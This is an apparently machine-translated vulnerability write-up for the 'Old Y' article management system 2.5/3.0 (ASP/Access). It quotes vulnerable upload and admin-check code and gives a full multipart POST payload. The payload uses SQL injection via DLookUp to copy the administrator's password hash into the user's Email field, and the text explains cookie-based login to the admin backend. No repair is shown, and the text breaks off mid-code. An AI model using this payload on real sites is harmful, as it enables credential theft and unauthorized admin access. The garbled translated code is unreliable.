Old Y Article management system 2.5 3.0 acces vulnerability and repair

Affected Version: versions with 2.5 3.0 acces longer than expected

User/Upload. asp file
34-50 rows

Preview source code

Print about
01 if Uprequest. form ("file_Err") <> 0 then

02 select case Uprequest. form ("file_Err ")

03 case 1: str = "<div style =" "padding-top: 5px; padding-bottom: 5px;" "> <font color = blue>" & Uprequest. maxSize/1024 & "K [<a href = javascript: history. go (-1)> re-upload </a>] </font> </div>"

04 case 2: str = "<div style =" "padding-top: 5px; padding-bottom: 5px; ""> <font color = blue> the file format is incorrect [<a href = javascript: history. go (-1)]> re-upload </a>] </font> </div>"

05 case 3: str = "<div style =" "padding-top: 5px; padding-bottom: 5px; ""> <font color = blue> the file is too large and the format is incorrect [<a href = javascript: history. go (-1)> re-upload </a>] </font> </div>"

06 end select

07 response. write str

08 else

09 Note: After the Avatar is uploaded successfully, update the Avatar path to the UserFace field.

10 SQL = "Update" & tbname & "_ User set UserFace =" & Uprequest. Form ("file") & "where ID =" & LaoYID

11 conn.exe cute (SQL)

12 response. write "<script language =" "javascript" "> parent. UserReg. UserFace. value =" & Uprequest. Form ("file ")&";"

13 response. write "</script>"

14 response. write "<div style =" "margin-top: 6px;" "> <font color = red> upload successful </font>. Refresh the page to view the new Avatar. <A href = javascript: history. go (-1)> re-upload </a> </div>"

15

16 conn. close

17 set conn = nothing

18 end if

60-67 lines of code:
Preview source code

Print about
1. generate an avatar

2. Note that if it is not the gif suffix, the uploaded avatar will be processed in length and width. Therefore, in order to upload smoothly, you should upload a gif file.

3 If right (RV_img, 4) <> ". gif" then

4 Dim S_Width, S_Height, H_Temp, W_Temp

5 S_Width = 100

6 S_Height = 100

7 Set Jpeg = Server. CreateObject ("Persits. Jpeg") to create an instance

8 Path = Server. MapPath (RV_img) processing image Path

9 Open the image using Jpeg. Open Path

Upload the Avatar packet capture content. I used the Firefox browser plug-in livehttp. I will not put the content in the header here.
Send the following PostData.
Preview source code

Print about
01 ----------------------------- 4827543632391

02 Content-Disposition: form-data; name = "file"; filename = "c: 1.gif"

03

04 gif87a

05 123123123123123123123

06

07 ----------------------------- 4827543632391

08 Content-Disposition: form-data; name = "file"

09

10 // The key point is what DLookup is and how to use it. Please search by yourself on Baidu or google. Thank you.

11 abc, Email = DLookUp (admin_pass, Yao_admin, Id = 1), Sex = 0

12

13 ----------------------------- 4827543632391

14 Content-Disposition: form-data; name = "submit"

15

16é? ′?

17 ----------------------------- 4827543632391 --

After returning, you can see that your EMAIL is changed to the Administrator's MD5 encrypted string. The author of the old Y Article management system has done some tricks in MD5.asp, saving the MD5 as the first 16 digits, and cannot crack the ciphertext. But it does not matter ··
Attackers can log on to the background using cookies ···

Admin/admin_check.asp
 
01 <%

02 Dim LaoYAdminID, LaoYAdminName, LaoYAdminPass, IsAdmin, rs5

03 too weak ····

04 LaoYAdminID = LaoYRequest (Request. Cookies ("LaoYAdmin") ("UserID "))

05 LaoYAdminName = CheckStr (Request. Cookies ("LaoYAdmin") ("UserName "))

06 LaoYAdminPass = CheckStr (Request. Cookies ("LaoYAdmin") ("UserPass "))

07

08 If LaoYAdminID <> "" and LaoYAdminName <> "" and LaoYAdminPass <> "" then

09 set rs5 = server. CreateObject ("adodb. recordset ")

10 SQL = "Select Top 1 * from [" & tbname & "_ Admin] where id =" & LaoYAdminID & "and Admin_Pass =" & LaoYAdminPass & "and Admin_Name =" & LaoYAdminName &""

11 on error resume next

12 rs5.open SQL, conn, 1, 1

13 Dim myadminid, myadminpass, myadminuser

14 myadminid = rs5 ("ID ")

15 myadminpass = rs5 ("Admin_Pass ")

16 myadminuser = rs5 ("Admin_Name ")

17 myadminip = rs5 ("Admin_IP ")

18 yaomight = rs5 ("AdminMight ")

19 yaoadmintype = rs5 ("AdminType ")

20 yaoadpower = rs5 ("ADPower ")

21 yaoWritePower = rs5 ("WritePower ")

22 yaoManagePower = rs5 ("ManagePower ")

23 rs5.close

24 set rs5 = nothing

25 is too weak ····

26 If myadminid <> Int (LaoYAdminID) or myadminpass <> LaoYAdminPass or myadminuser <> LaoYAdminName or myadminip <> GetIP Then

27 IsAdmin = 0

28 &